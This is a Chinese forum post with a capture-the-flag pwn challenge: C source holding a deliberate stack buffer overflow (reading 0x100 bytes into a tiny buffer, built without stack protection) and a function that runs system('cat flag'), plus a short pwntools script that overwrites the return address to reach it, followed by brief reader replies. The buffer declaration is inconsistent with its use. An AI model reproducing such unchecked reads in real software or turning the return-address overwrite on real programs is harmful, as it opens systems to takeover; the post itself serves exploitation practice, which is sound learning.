xuenixiang_2019_pwn_pwn2
源代码:#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
int main()
{
char buf;
memset(&buf,0,0x30);
setvbuf(stdout, 0, 2, 0);
setvbuf(stdin, 0, 1, 0);
printf("say something?\n");
read(0,buf,0x100);
printf("oh,that's so boring!\n");
return 0;
}
void get_shell_()
{
puts("tql~tql~tql~tql~tql~tql~tql");
puts("this is your flag!");
system("cat flag");
}
//编译时用命令:
//gcc -z execstack -fno-stack-protector -o stack1 stack1.cexp:
#encoding:utf-8
#!/upr/bin/env python
from pwn import *
p = process("./stack1")
getshell=0x400751
payload = "a"*0x38+p64(getshell)
p.send(payload)
p.interactive()
**** Hidden Message *****
第一次看这种pawn题 真心不知道怎么做 flag 不反汇。。 Lucky 发表于 2020-9-16 22:20
flag 不反汇。。
啥意思,flag不对吗 学习一下,老实说,看的有点儿懵
太给力了,这么多好东西! dddddddddddddd 非常不错啊,感谢楼主无私的共享精神!
页:
[1]